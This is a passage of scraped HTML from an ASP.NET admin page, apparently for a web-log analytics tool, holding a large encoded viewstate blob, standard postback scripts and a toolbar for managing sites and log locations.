2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2Jq
ZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAtAU2VvT3B0aW9ucwH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAADVNlb09wdGlvbnNUYWILZAUWY3RsMDAkTVBIJGdyZFNlb1N0YXR1cw8FI1RydWV8VHJ1ZXx8VHJ1ZXxUcnVlfHxGYWxzZXxGYWxzZXwwZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTcPMtoLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFy
eWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAApATG9nU3RhdHVzAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAMTG9nU3RhdHVzVGFiC2QFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYZBSRjdGwwMCRNUEgkY2hrU2VvRW5hYmxlZF9T
ZXR0aW5nQ2hlY2sFKGN0bDAwJE1QSCRjaGtTdHJpcEFmdGVyU2VtaV9TZXR0aW5nQ2hlY2sFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMAVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMwVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ0BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDUFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNgVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ3BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDgFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkOQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMgVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMwVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNgVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNwVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxOAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2lu
ZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxOQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMQUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTIPMtwLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4w
LjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAtATG9nT3B0aW9ucwH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAADUxvZ09wdGlvbnNUYWILZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTMPMuALAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQ
YWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAA1ATG9nTG9jYXRpb25zAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAPTG9nTG9jYXRpb25zVGFiC2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW00DzLUCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0
ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAAHQExvZ0ZUUAH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAACUxvZ0ZUUFRhYgtkcmbyeLDF/4qMqAmo0Fm+jBgwdStOP6+9e4Q93/Py69E=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=pVn15ziXvQY5aBffxiDTK6PUkVd1wbLwZ8qHXgDTDQU-gDmeOQZCbCnf3LN8cb6wKZJNHgRyjasDbTS9TuTZ7GXz6UL6zabFuTHuGM9izuBi-gzcVhEZX9Fg6cQx4oJc6iXtzA8ahWISPmTnWBlMNk0W7V9Kl_5HxQNbPSm8qmJcO3ou2wT9aun3Nb592DHA0&amp;t=26c081" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/WebResource.axd?d=tmbPiP2D38VVojyjJVsEkXwe8X4rw_c60mStWfistR8pyJPOf4ElR79y8d6v9XE45y9Xuon7XBs01GFx3aJPBQ4-yv7YCKPFvc37E1RidaE1&amp;t=634219308989960000" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$TPH$UpdatePanel1','','tctl00$MPH$UpdatePanel5','','tctl00$MPH$UpdatePanel3',''], ['ctl00$BPH$btnSave','','ctl00$BPH$btnEdit','','ctl00$MPH$btnRefresh','','ctl00$BPH$mnu1','','ctl00$MPH$btnUpdateIISImport','','ctl00$BPH$btnDelete',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Sites
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>
   
<!-- HyperMenu -->
<div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_BPH_mnu1' name='ctl00$BPH$mnu1' style='z-index:800'>
   <li class='hmItem hmFirst' id='ctl00_BPH_mnu1_btnImport' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Import<span class='hmArrow'></span></a>
   <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
       <li class='hmItem hmFirst hmLast' id='ctl00_BPH_mnu1_btnImport_btnImportIIS' style='z-index: 800'><a class='hmA' href='#'>From IIS</a></li>
   </ul><div class='hmScrollDown'></div></div>
   </li>
   <li class='hmItem hmLast' id='ctl00_BPH_mnu1_btnAdd' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Add<span class='hmArrow'></span></a>
   <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
       <li class='hmItem hmFirst hmLast' id='ctl00_BPH_mnu1_btnAdd_btnAddLogLocation' style='z-index: 800'><a class='hmA' href='#'>Log Location</a></li>
   </ul><div class='hmScrollDown'></div></div>
   </li>
</ul>
</div>

   <span id="logLocationButtons" style="display: none">
       <div id="ctl00_BPH_btnEdit" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnEdit',''); return false;"><span class="BBInner">Edit</span></a></div>
       <div id="ctl00_BPH_btnDelete" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDelete(); return false;"><span class="BBInner">Delete</span></a></div>
   </span>

           </div>
           <div class="ButtonBarRight">
               
   <div id="ctl00_BrPH_btnCancel" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="DoPopupWindowClose();; return false;"><span class="BBInner">Cancel</span></a></div>

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
